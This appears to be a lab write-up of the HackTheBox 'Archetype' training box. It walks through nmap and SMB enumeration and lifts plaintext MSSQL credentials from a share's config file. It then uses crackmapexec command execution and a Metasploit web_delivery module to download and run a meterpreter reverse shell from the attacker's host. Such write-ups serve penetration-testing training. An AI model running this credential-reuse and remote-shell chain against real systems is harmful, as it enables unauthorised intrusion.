Archetype on HackTheBox
Archetype is a box on HacktheBox that is classified as “very easy.” It’s in the starting point so it’s meant to give introductory lessons in using SMB, MSSQL, and discovering plain text passwords. After completing the CPTS path, I decided to go back and revisit the starting point machines and see where I could try different techniques and tools to expand my knowledge of them and practice.
We start with an Nmap Scan:
$ nmap -sC -sV 10.129.53.34
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-21 13:21 BST
Nmap scan report for 10.129.53.34
Host is up (0.070s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-06-21T11:30:35
|_Not valid after: 2053-06-21T11:30:35
|_ssl-date: 2023-06-21T12:22:00+00:00; 0s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h45m01s, deviation: 3h30m02s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-06-21T12:21:55
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-06-21T05:21:56-07:00
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.64 secondsThere’s lots of places to start here, but if there’s an SMB port open and no web port, as here, I’ll usually start by looking at what’s in the share. There’s a number of ways to do that.
SMB Enumeration and File Download
We can start with SMBclient:
$ smbclient -L //10.129.53.34
Password for [WORKGROUP\htb-user]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
We see there is a share called “backups” that we might be ineterested in. We can login with SMBclient and get see what’s in there.
$ smbclient '\\10.129.53.34\backups'
Password for [WORKGROUP\htb-user]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 12:20:57 2020
.. D 0 Mon Jan 20 12:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 12:23:02 2020
5056511 blocks of size 4096. 2615956 blocks available
smb: \>
We can then download this using the command download prod.dtsConfig.
We can do the same thing with SMBMap.
$ smbmap -H 10.129.53.34 -u guest
[+] IP: 10.129.53.34:445 Name: 10.129.53.34
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backups READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
$ smbmap -H 10.129.53.34 -u guest -r backups
[+] IP: 10.129.53.34:445 Name: 10.129.53.34
Disk Permissions Comment
---- ----------- -------
backups READ ONLY
.\backups\*
dr--r--r-- 0 Mon Jan 20 12:20:57 2020 .
dr--r--r-- 0 Mon Jan 20 12:20:57 2020 ..
fw--w--w-- 609 Mon Jan 20 12:23:18 2020 prod.dtsConfig
Mount the \backups share
If we install cifs-utils with sudo apt install cifs-utils we can mount the share and use it.
$ sudo mount -t cifs '\\10.129.53.34\backups' /mnt/remote
Password for root@\\10.129.53.34\backups:
$ cd /mnt/remote
$ ls -la
total 8
drwxr-xr-x 2 root root 0 Jan 20 2020 .
drwxr-xr-x 3 root root 4096 Jun 21 10:58 ..
-r-xr-xr-x 1 root root 609 Jan 20 2020 prod.dtsConfig
Exposed Credentials
However we choose to get the file, we find a set of creds in it when we examine it. Incidentally, this is one of the big lessons of the starting point track. Credentials are everyhwhere. They’re in user’s notes, they’re in config files, they’re hardcoded into binaries.
$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>Check Logins with CrackmapExec (CME)
The walkthrough for the box now expects you to login and fiddle with the MSSQL service to create a reverse shell. That’s great info and useful, but I wanted to see what I could do with crackmapexec and metasploit. We can do the same with much less fiddling using crackmapexec (CME). First we check services that we’d previously identified with our nmap scan: SMB, winrm, and MSSQL.
$ cme smb 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'
SMB 10.129.53.34 445 ARCHETYPE [*] Windows Server 2019 Standard 17763 x64 (name:ARCHETYPE) (domain:Archetype) (signing:False) (SMBv1:True)
SMB 10.129.53.34 445 ARCHETYPE [+] Archetype\sql_svc:M3g4c0rp123
$ cme winrm 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'
SMB 10.129.53.34 5985 ARCHETYPE [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)
HTTP 10.129.53.34 5985 ARCHETYPE [*] http://10.129.53.34:5985/wsman
WINRM 10.129.53.34 5985 ARCHETYPE [-] Archetype\sql_svc:M3g4c0rp123
$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123'
MSSQL 10.129.53.34 1433 ARCHETYPE [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)
MSSQL 10.129.53.34 1433 ARCHETYPE [+] Archetype\sql_svc:M3g4c0rp123 (Pwn3d!)
So we can see from this that we can login with smb, we can’t login with winrm and that the account has admin privileges over the MSSQL service. (Indicated by the flag Pwn3d!)
This means that we can execute commands and very easily get a meterpreter shell going.
Meterpreter Shell Using CME and the Sql_Svc Account.
Since we’ve got admin rights over the MSSQL service, it’s very easy to execute commands and even get a reverse shell. We can get a meterpreter shell without even uploading anything onto the target system.
We can execute commands using the -X switch for example, we can get information about the target system using cme and the X switch:
$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123' -X systeminfo
MSSQL 10.129.53.34 1433 ARCHETYPE [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)
MSSQL 10.129.53.34 1433 ARCHETYPE [+] Archetype\sql_svc:M3g4c0rp123 (Pwn3d!)
MSSQL 10.129.53.34 1433 ARCHETYPE [+] Executed command via mssqlexec
MSSQL 10.129.53.34 1433 ARCHETYPE --------------------------------------------------------------------------------
MSSQL 10.129.53.34 1433 ARCHETYPE Host Name: ARCHETYPE
MSSQL 10.129.53.34 1433 ARCHETYPE OS Name: Microsoft Windows Server 2019 Standard
MSSQL 10.129.53.34 1433 ARCHETYPE OS Version: 10.0.17763 N/A Build 17763
--- <SNIP> ---
MSSQL 10.129.53.34 1433 ARCHETYPE System Type: x64-based PC
We setup to metasploit and then select the exploit/multi/script/web_delivery module and select the following commands:
set lhost <Attack IP>
set lport 4444
set payload windows/x64/meterpreter/reverse_tcp
set target 2[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) >> optionsModule options (exploit/multi/script/web_delivery): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST <ATTACK IP> yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 2 PSH
And run the job.
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) >> run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.15:4444
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >> [*] Using URL: http://10.10.14.15:8080/F7tGbZa9SUqbMJ
[*] Server started.
[*] Run the following command on the target machine:
<SNIP>
The job starts and goes to background immediately. Basically, it’s waiting for a connection to serve up the payload. Now we run the web_delivery module on crackmapexec and use the url we were given by metasploit.
$ cme mssql 10.129.53.34 -u sql_svc -p 'M3g4c0rp123' -M web_delivery -o URL=http://10.10.14.15:8080/F7tGbZa9SUqbMJ
MSSQL 10.129.53.34 1433 ARCHETYPE [*] Windows 10.0 Build 17763 (name:ARCHETYPE) (domain:Archetype)
MSSQL 10.129.53.34 1433 ARCHETYPE [+] Archetype\sql_svc:M3g4c0rp123 (Pwn3d!)
And we get a meterpreter shell!
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >> [*] 10.129.53.34 web_delivery - Delivering Payload (3738 bytes)
[*] Sending stage (200774 bytes) to 10.129.53.34
[*] Meterpreter session 1 opened (10.10.14.15:4444 -> 10.129.53.34:49677) at 2023-06-21 15:04:35 +0100
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >> sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(C:\Windows\system32) >
I’ll cover escalating using Rogue Potato in Part II.